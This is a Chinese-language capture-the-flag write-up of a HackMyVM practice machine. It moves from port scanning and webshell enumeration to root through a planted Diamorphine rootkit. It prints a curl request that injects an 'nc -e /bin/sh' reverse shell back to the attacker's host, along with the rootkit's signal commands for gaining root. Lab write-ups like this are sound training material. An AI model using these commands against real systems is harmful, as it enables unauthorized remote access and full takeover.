打靶记录(九一)之HMVHacked

所渗透的靶机IP为192.168.56.114

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.114
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 02:41 UTC
Nmap scan report for 192.168.56.114 (192.168.56.114)
Host is up (0.00036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E7:9A:3C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.03 seconds

sudo nmap -sT -sV -sC -O -p22,80 192.168.56.114     
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 02:42 UTC
Nmap scan report for 192.168.56.114 (192.168.56.114)
Host is up (0.00031s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:75:44:05:5f:f8:4f:ac:a1:33:fa:84:03:db:6f:94 (RSA)
|   256 5a:b6:c6:9d:a9:15:42:74:4c:7a:f9:dd:67:ae:75:0e (ECDSA)
|_  256 05:97:3c:74:bd:cf:8d:80:87:05:26:64:7f:d9:3d:c3 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:E7:9A:3C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.20 seconds

Getshell

存在一个/robots.txt,得到一个/secretnote.txt

[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.
 |__> Webshell installed.
 |__> Root shell created.

-h4x0

似乎已经有webshell了

那就扫描可能已经存在的webshell

feroxbuster --url=http://192.168.56.114/ -w /usr/share/wordlists/seclists/Web-Shells/backdoor_list.txt

得到simple-backdoor.php，但是直接会重定向

curl -s http://192.168.56.114/simple-backdoor.php -vv

*   Trying 192.168.56.114:80...
*   Connected to 192.168.56.114 (192.168.56.114) port 80

> GET /simple-backdoor.php HTTP/1.1
> Host: 192.168.56.114
> User-Agent: curl/8.3.0
> Accept: */*
>
> < HTTP/1.1 302 Found
> < Server: nginx/1.14.2
> < Date: Fri, 16 Feb 2024 02:51:46 GMT
> < Content-Type: text/html; charset=UTF-8
> < Transfer-Encoding: chunked
> < Connection: keep-alive
> < Location: /
> < 
> I modified this webshell to only execute my secret parameter.

* Connection #0 to host 192.168.56.114 left intact

似乎需要提供一个参数，那就fuzz

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.56.114/simple-backdoor.php?FUZZ=id' -fs 62

结果是secret

那就可以开启一个监听然后做个反弹shell了

试了几个payload不行，似乎空格还不被允许进行了URL编码。

最后：

curl -s 'http://192.168.56.114/simple-backdoor.php?secret=nc%20192.168.56.102%201234%20-e%20/bin/sh'

提权

得到shell之后，用了pspy,linpeas都枚举了一遍，但是都没有发现什么东西。

最后得知这个机器已经存在rootkit

https://github.com/m0nad/Diamorphine

kill -63 0

使这个rootkit可见

lsmod 
lsmod
Module                  Size  Used by
diamorphine            16384  0
udp_diag               16384  0
unix_diag              16384  0
binfmt_misc            20480  1
tcp_diag               16384  0
inet_diag              20480  2 tcp_diag

根据原项目，只要发送64就能变成root

www-data@hacked:/tmp$ kill -64 0
kill -64 0
www-data@hacked:/tmp$ id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

现在我们是root!

碎碎念

前面Getshell还是比较简单的，简单得枚举就能拿到权限。但是后面提权还是想不到，通过内核提权感觉是最后才会使用的方法，然后这个叫做diamorphine的rootkit也是第二次遇见了，强。